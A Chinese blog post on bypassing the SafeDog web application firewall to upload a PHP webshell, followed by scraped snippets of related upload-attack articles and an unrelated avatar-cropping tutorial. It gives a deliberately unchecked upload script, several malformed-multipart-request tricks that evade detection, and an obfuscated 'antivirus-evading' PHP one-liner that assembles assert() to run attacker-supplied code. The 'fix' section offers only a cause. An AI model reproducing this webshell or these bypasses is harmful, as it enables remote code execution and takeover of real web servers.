绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:

<?php

$path = dirname(__FILE__) . ‘/upload/‘;

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "<br/>";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

很明显,文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断:

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

(3)修改Content-Disposition字段值的大小写:

6、菜刀连接一句话:

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:

<?php

/*

PHP一句话木马

assert($string)

*/

$arr = array(‘a‘,‘s‘,‘s‘,‘e‘,‘r‘,‘t‘);

$func = ‘‘;

for($i=0;$i<count($arr);$i++) {

$func .= $func . $arr[$i];

}

$func($_REQUEST[‘c‘]);

?>

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

时间: 2024-12-12 22:47:45

绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)的相关文章

webshell上传技术之--Fckeditor漏洞上传webshell

[实验目的] Fckeditor为在线网友编辑器.本实验演示Fckeditor2.4.2以下版本的一个编辑器上传漏洞. 目前最新版本为CKEditor 4.5.3. [实验原理] Fckeditor在2.4.2以下存在一个直接上传任意文件的上传页面,可直接上传webshell. [实验步骤] 一.编辑器操作 1.1 打开网站输入 /FCKeditor,判断是否有fckeditor编辑器,出现403禁止访问,说明此目录存在 1.2判断fckeditor编辑器版本号,输入:http://ip:83/

网络安全系列之五十五 利用抓包来上传webshell

在Web渗透的过程中,最为麻烦的一个环节就是上传WebShell,之前曾介绍过利用数据库备份来上传,这也属于最为简单和古老的一种方法.本文将介绍另外一种利用抓包来上传WebShell的方法,目标网站采用南方数据5.0,实验平台采用IIS搭建,如何利用IIS搭建ASP网站可参考博文http://yttitan.blog.51cto.com/70821/1579372. 首先登录网站后台,找到上传点. 点击浏览按钮,打开"选择文件"窗口,随意选择一张准备上传的图片. 注意,这里先不要点击&

实战利用tomcat的JMX端口上传webshell

1. 配置tomcat启动jconsole到1099端口的配置:参考文章:https://www.cnblogs.com/baihuitestsoftware/articles/6405580.html //可以将其设置为无密码访问: cd /opt/apache-tomcat-8.0.3/bin vi catalina.sh # OS specific support. $var _must_ be set to either true or false.添加如下变量: CATALINA_OP

关于安全狗文件上传

文章转载至科拉实验室,作者倾旋@科拉实验室 Part 1 分析 此文主要研究安全狗的数据包分析功能,由于很多人都认为安全狗是通过正则去匹配的,那么暂且那么说吧.这款应用层的WAF的确在测试中让人头大.那么安全狗是如何分析我们的数据的呢?在这里我做了一个拓扑图: Part 2 测试过程 测试系统:WINXP脚本语言:PHP5.4.45WEB服务器:Apache/2.4.23(Win32)安全狗版本:3.5.12048目前,用一个PHP上传文件的脚本来做上传测试. <?php if ((($_FIL

网站用户头像剪裁上传完整案例

做为网站前段开发人员来说,用户头像剪裁和上传是一个很常用的功能,一般这个功能涉及到图片的放大,缩小,移动,旋转,和剪裁.下面我们来做一个完整的demo,剪裁后的图片以base64的形式返回,base64怎么上传到后台服务器,很简单,这里不做介绍. 图片的操作:手机端操作和其他手机图片应用操作没有任何区别. PC端:通过鼠标的滚轮是实现图片的放大缩小,长按左键移动鼠标实现图片的移动,双击图片现实图片的旋转. demo下载地址:下载1 下载2 在这个demo中,我们使用Jquery的插件(jquer

如何上传webshell后改回原来的webshell的格式

一般后台不给允许上传php,asp格式的东东 所以我们要把木马改为jpg格式 记录下上传的路径 我们上传后木马因为格式不对不能被正确解析,我们可以利用网站的备份数据库模式恢复格式 在备份数据库那填上我们刚刚得到的上传路径 ..db/1.aspx 是为了把格式重新改为aspx 然后我们就能访问webshell了 /db/1.aspx就是我们的webshell

一步一步教你用PHP+MySql搭建网站 No.5 图片上传、故事删除

上篇文章中讲到,story.php中的表单提交之后的页面是story_submit.php,我们就看一下story_submit.php是如何完成文章的发表的 老样子,先上代码: <?php # add / modify story record include_once('include_fns.php'); $handle = db_connect(); $headline = $_REQUEST['headline']; $page = $_REQUEST['page']; $time =

文件上传姿势整理(附实战)

--人的理想志向往往和他的能力成正比. 在这里整理一些自己最近学习的文件上传的知识,方便自己回忆和深刻记忆(不全,只是将自己不知道的原理以及技巧分享出来). 文件上传漏洞的几种情况(在ichunqiu的博客园扒的 - -.): MIME类型绕过漏洞(就是content-type:) 文件内容检测绕过 空字节截断(%00,0x00) 解析导致的文件上传漏洞: IIS6.0/IIS7.0/IIS7.5(后面细说) Apache站上的解析缺陷绕过上传 htaccess文件上传解析漏洞 还有就是各种cm

文件上传小技巧/原生态【html篇】

引语:大家都知道,html中上传文件就一个input,type=file就搞定了.但是,这个标签的样式,实在不值得提点什么,要改动他的样式,恐怕也是较难的.但是其实挺简单,今天就来说说上传文件小技巧吧! 1. 怎样自定义样式? 1. 只管按照自己喜欢看到的样式去定义即可,如<a href='javascript:;' class='upload-button'></a>,可以是背景图片效果,可以是文字指示,总之想怎么改怎么改!有了按钮,还需要一个文件名容器,用来存放选择上传文件时的